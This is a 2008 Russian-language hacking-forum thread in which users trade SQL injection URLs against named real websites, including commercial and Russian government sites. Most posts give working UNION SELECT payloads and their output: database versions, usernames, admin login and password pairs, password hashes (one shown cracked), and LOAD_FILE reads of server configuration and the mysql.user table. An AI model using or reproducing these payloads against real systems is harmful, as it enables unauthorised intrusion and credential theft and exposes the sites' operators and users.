Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.06.2008, 16:55
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
www.semplice.it
http://www.semplice.it/cucina_scheda.php?id=-99999+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9/*
5.0.45:cucina@semplice.village.it:cucina
http://www.semplice.it/cucina_scheda.php?id=-99999+union+select+1,TABLE_NAME,3,4,5,6,7,8,9+FROM +INFORMATION_SCHEMA.TABLES+limit+17,1/*
|
|
|
02.06.2008, 23:53
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
telematrixusa.com
Код:
http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C61,0x3,version(),user(),database())/*
5.0.45-community-nt-logtelmtrxusa@localhosttelematrix
Код:
http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C61,0x3,username,0x3,password)+from+admin/*
webadmin�webdemo
http://www.telematrixusa.com/siteadmin
|
|
|
|
03.06.2008, 17:12
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
134986
Репутация:
13
|
|
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+1/*
database: bsigroup_out
version: 5.0.22
user: bsigroup_newwww@localhost
P.S. есть таблица _system_user Поля(_Name,_status,_login_xz,_pass_xz)
Код:
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*
P.P.S. Сам не до крутил её , кто найдёт что интересно киньтесь плз на мыло)) так не сайт нужен просто интересно чё от туда можно вытащить было.
|
|
|
|
03.06.2008, 17:47
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Сообщение от bakl
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+1/*
database: bsigroup_out
version: 5.0.22
user: bsigroup_newwww@localhost
P.S. есть таблица _system_user Поля(_Name,_status,_login_xz,_pass_xz)
Код:
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*
P.P.S. Сам не до крутил её , кто найдёт что интересно киньтесь плз на мыло)) так не сайт нужен просто интересно чё от туда можно вытащить было.
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+concat_ws(0x3a,_name,_login_xz,_pas s_xz)+from+_system_user+where+_system_user_id=1/*
Super User:root:89905f508ebdc32e7eb0c24fdb118305
логин был зашифрован в md5 )
Последний раз редактировалось ~!DoK_tOR!~; 03.06.2008 в 18:09..
|
|
|
|
03.06.2008, 21:53
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
www.bisart.ru --- в антибояне нет
http://www.bisart.ru/auto/index.php?sid=54+union+select+1,version(),3,4,5,6, 7/*
4.0.27-log
db11539m
m11539@he.hoster.ru
ЗЫ. первый найденный мной скуль иньект  правда с 4ой базой я еще не работал ... |
|
|
|
03.06.2008, 21:58
|
|
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065
Репутация:
1112
|
|
http://bgmaker.ventdaval.com/get.php?id=-9999999 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626 567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F ,User(),0x7873716C696E6A656E64),0x71),0x71)%23
Database Version: 5.0.18-standard-log
Database name: db_bgmaker
User name: cay@skybar.dreamhost.com
|
|
|
|
03.06.2008, 22:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Сообщение от IIAHbI4
http://bgmaker.ventdaval.com/get.php?id=-9999999 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626 567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F ,User(),0x7873716C696E6A656E64),0x71),0x71)%23
фигасе закрутил. 
http://www.rakurs.rovno.ua/info.php?id=-4740+union+select+от, одного,до,шести,database(),кагбе восемь,9,version(),user(),12,13,14/*
database() - rakursr_db
version() - 5.0.45
user() - rakursr_user@localhost
__________________
BlackHat. MoDL
|
|
|
|
04.06.2008, 00:27
|
|
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065
Репутация:
1112
|
|
Сообщение от ChaaK
Эммм тулза sql-inj tool конечшно полезная.
но прежде чем выкладывать проверяй в браузере.
Не проще ли пере писать в нормальном виде по количеству столбцов?
ты наркоман? этого
Database name: db_bgmaker
User name: cay@skybar.dreamhost.com
не достаточно ?
|
|
|
|
04.06.2008, 11:31
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Правительство Амурской области
http://www.amurobl.ru/index.php?m=&r=3&c=-1/**/union/**/select/**/0,1,2,3,version(),5,6/*
|
|
|
|
04.06.2008, 15:40
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Ну вот и расшифровался в базе хешик
root:*313D4F6D366ADB0901FFDDA18A2A5D156C99BD1F:rel ixrelix
выкладывал до этого, но раз не полностью раскрученно было- убрал, теперь все ок =)
давайте погуглим: answer.php?rub=
Да, вот и пожалуйста:
и так:
http://****** .zao.mos.ru/answer.php?rub=
-1+union+select+LOAD_FILE('/usr/local/apache/httpd.conf'),2,3,4,5,6,7/*
-1+union+select+concat(user,0x3a,password),2,3,4,5, 6,7+from+mysql.user/*
file_priv=Y
а что дальше? а вот что.Что в столице денег нет что ли на нормальный не бажный сайт? Не верю. для zao.mos.ru на Битрикс бабла хватило 
Последний раз редактировалось xcedz; 04.06.2008 в 18:21..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
